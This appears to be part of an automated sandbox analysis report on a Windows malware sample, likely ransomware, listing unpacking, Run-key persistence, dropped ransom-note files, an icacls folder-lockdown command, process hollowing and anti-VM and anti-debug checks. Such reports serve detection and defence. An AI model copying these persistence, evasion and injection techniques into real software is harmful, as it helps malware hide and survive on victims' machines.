          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\zg% source: file.exe, 00000007.00000003.2725712651.0000000003617000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696418112.0000000003656000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696841331.000000000366B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725226739.0000000003616000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2695973619.000000000361E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725916015.0000000003626000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\o source: file.exe, 00000007.00000003.2639636291.000000000092F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\* source: file.exe, 00000007.00000003.2674265194.000000000092F000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 2.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 7.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeUnpacked PE file: 12.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeUnpacked PE file: 13.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeUnpacked PE file: 15.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 2.2.file.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 7.2.file.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeUnpacked PE file: 12.2.file.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeUnpacked PE file: 13.2.file.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeUnpacked PE file: 15.2.file.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405655 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00405655
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004025CD push ecx; ret 0_2_004025E0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021510AF push ecx; retf 0_2_021510B2
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02208F05 push ecx; ret 0_2_02208F18
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00428565 push ecx; ret 2_2_00428578
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_021930AF push ecx; retf 5_2_021930B2
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_02258F05 push ecx; ret 5_2_02258F18
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_021860AF push ecx; retf 6_2_021860B2
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_02358F05 push ecx; ret 6_2_02358F18
          Source: file.exeStatic PE information: section name: .text entropy: 7.737435826945235
          Source: file.exe.2.drStatic PE information: section name: .text entropy: 7.737435826945235

          Persistence and Installation Behavior

          barindex
          Source: C:\Users\user\Desktop\file.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
          Source: C:\Users\user\Desktop\file.exeSystem file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.htmlJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeJump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_00481920
          Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0214F71C rdtsc 0_2_0214F71C
          Source: C:\Users\user\Desktop\file.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,2_2_0040E670
          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1100000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-45119
          Source: C:\Users\user\Desktop\file.exe TID: 2104Thread sleep time: -1100000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A4C54 GetSystemTimes followed by cmp: cmp dword ptr [004b6d24h], 0ah and CTI: jne 004A4E49h0_2_004A4C54
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00410160
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0040F730
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0040FB98
          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1100000Jump to behavior
          Source: file.exe, 00000007.00000002.2763764574.0000000000848000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
          Source: file.exe, 0000000C.00000002.2437911480.0000000000778000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
          Source: file.exe, 00000002.00000002.2190408839.00000000007AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: file.exe, 00000002.00000002.2190408839.0000000000798000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
          Source: file.exe, 00000002.00000003.2187001173.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2190408839.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2188313077.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2762877156.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000002.2763919794.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000003.2431855915.0000000000802000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2437911480.0000000000802000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000003.2473936462.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2477831755.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000F.00000003.2513307620.0000000000838000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000F.00000002.3354114917.00000000007D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: file.exe, 0000000D.00000002.2477831755.0000000000828000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0y
          Source: file.exe, 0000000F.00000003.2513307620.0000000000838000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000F.00000002.3354114917.0000000000838000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWeC&
          Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_2-45121
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0214F71C rdtsc 0_2_0214F71C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401006 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401006
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_0042A57A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405655 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00405655
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0214E0A3 push dword ptr fs:[00000030h]0_2_0214E0A3
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021E0042 push dword ptr fs:[00000030h]0_2_021E0042
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_021900A3 push dword ptr fs:[00000030h]5_2_021900A3
          Source: C:\Users\user\Desktop\file.exeCode function: 5_2_02230042 push dword ptr fs:[00000030h]5_2_02230042
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_021830A3 push dword ptr fs:[00000030h]6_2_021830A3
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeCode function: 6_2_02330042 push dword ptr fs:[00000030h]6_2_02330042
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004278D5 GetProcessHeap,2_2_004278D5
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401006 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401006
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404345 SetUnhandledExceptionFilter,0_2_00404345
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406F9A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00406F9A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004041B5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004041B5
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004329EC
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004329BB SetUnhandledExceptionFilter,2_2_004329BB

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_021E0110 VirtualAlloc,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_021E0110
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeMemory written: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeMemory written: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeMemory written: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection unmapped: C:\Users\user\Desktop\file.exe base address: 400000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeProcess created: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe --TaskJump to behavior
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeProcess created: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe" --AutoStartJump to behavior
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeProcess created: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe" --AutoStartJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_022080F6 cpuid 0_2_022080F6
          Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_004070B1
          Source: C:\Users\user\Desktop\file.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_02220AB6
          Source: C:\Users\user\Desktop\file.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,0_2_0220C8B7
          Source: C:\Users\user\Desktop\file.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,0_2_0221394D
          Source: C:\Users\user\Desktop\file.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_022149EA
          Source: C:\Users\user\Desktop\file.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_02213F87
          Source: C:\Users\user\Desktop\file.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,2_2_0043404A
          Source: C:\Users\user\Desktop\file.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_00438178
          Source: C:\Users\user\Desktop\file.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00440116
          Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_004382A2
          Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_0043834F
          Source: C:\Users\user\Desktop\file.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00438423
          Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,2_2_004387C8
          Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,2_2_0043884E
          Source: C:\Users\user\Desktop\file.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,2_2_00432B6D
          Source: C:\Users\user\Desktop\file.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,2_2_00432FAD
          Source: C:\Users\user\Desktop\file.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_004335E7
          Source: C:\Users\user\Desktop\file.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_00437BB3
          Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,2_2_00437E27
          Source: C:\Users\user\Desktop\file.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437E83
          Source: C:\Users\user\Desktop\file.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437F00
          Source: C:\Users\user\Desktop\file.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,2_2_0042BF17
          Source: C:\Users\user\Desktop\file.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_00437F83
          Source: C:\Users\user\Desktop\file.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_02270AB6
          Source: C:\Users\user\Desktop\file.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,5_2_0225C8B7
          Source: C:\Users\user\Desktop\file.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,5_2_0226394D
          Source: C:\Users\user\Desktop\file.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,5_2_022649EA
          Source: C:\Users\user\Desktop\file.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo